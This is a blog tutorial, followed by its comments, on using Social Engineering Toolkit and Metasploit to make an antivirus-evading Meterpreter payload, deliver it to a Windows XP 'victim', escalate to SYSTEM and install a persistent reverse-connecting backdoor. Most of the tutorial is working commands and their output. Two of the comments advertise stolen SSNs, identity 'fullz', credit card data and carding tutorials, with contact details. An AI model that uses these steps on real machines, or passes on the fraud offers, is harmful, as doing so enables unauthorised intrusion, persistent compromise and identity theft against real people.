Thursday 25 June 2015

Install Backdoor in Windows XP using Metasploit in Kali Linux


We have the following scenario:

Victim (Windows XP Machine) IP Address:  192.168.1.2

Attacker (Kali Linux Machine)     IP Address:  192.168.1.3

We will use Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when made to run at the Windows XP machine,will get the attacker complete access of the victim's machine. Then the attacker will use Metasploit to install a permanent backdoor on the victim machine.

We will perform the following steps:
1) Create malicious payload
2) Give the payload to the Victim.
3) Create listener (for the payload) on the Attacker on port 443.
4) When the user executes the payload, the Victim connects to the Attacker on port 443.
5) Escalate privilege to Windows user SYSTEM.
6) Install backdoor on the Victim.
7) Create listener (for the backdoor) on the Attacker on port 80.
8) Whenever the Victim boots, it automatically connects to the Attacker.

Perform the following steps on the Attacker (Kali Linux) Machine:

1) Create malicious executable payload.
1.1) Start Social Engineering Toolkit.
root@kali:~# setoolkit

1.2) Select option 1) Social Engineering Attacks
set> 1

1.3) Select option   4) Create a Payload and Listener
set> 4
set:payloads> Enter the IP address for the payload (reverse):192.168.1.3

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system

set:payloads>2

Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.

   1) shikata_ga_nai
   2) No Encoding
   3) Multi-Encoder
   4) Backdoored Executable

set:encoding>1
set:payloads> PORT of the listener [443]:
[-] Encoding the payload 4 times. [-]

[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)

[*] Your payload is now in the root directory of SET as payload.exe
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: no


2) We need to send this payload file  /usr/share/set/payload.exe to the Victim using social media, e-mail, uploading at a server, or any other type of choice.


3) Set up a handler on the Attacker machine using Metasploit.
3.1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

3.2) Start metasploit console.
root@kali:~# msfconsole
msf >

3.3) Select exploit.
msf > use exploit/multi/handler
 
3.4) Select payload.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

3.5) View options
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

3.6) Set options
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443

3.7) Execute exploit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...


4) As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.
 
[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038) at 2015-06-25 06:52:57 +0530

meterpreter > sysinfo
Computer        : WINSETU
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

5) Escalate privilege

meterpreter > getuid
Server username: WINSETU\shabbir

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


6) Install backdoor on the victim machine.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run persistence -X -i 10 -p 80 -r 192.168.1.3
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[+] Agent executed with PID 3648
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
meterpreter >


7) Install handler for the backdoor on the Attacker machine listening on port 80.
meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

msf exploit(handler) > set LPORT 80
LPORT => 80

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:80
[*] Starting the payload handler...


8) Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.
[*] Sending stage (769536 bytes) to 192.168.1.2[*]
 Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051) at 2015-06-25 07:19:35 +0530

meterpreter >


7 comments:

  1. does the msf know the already generated payload from SET ?
    payload generated by SET sent to the victim and the session is opened in msf ???

    ReplyDelete
  2. They must do the courses that are different from the other types of jobs. cursos de ti

    ReplyDelete
  3. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  4. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ReplyDelete
  5. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Sql injector
    Bitcoin cracker
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete
  6. Articles can be instrumental in debunking misinformation and fake news. What Dark Web By relying on thorough research and credible sources, journalists can counter false narratives and provide readers with accurate information to make informed judgments.

    ReplyDelete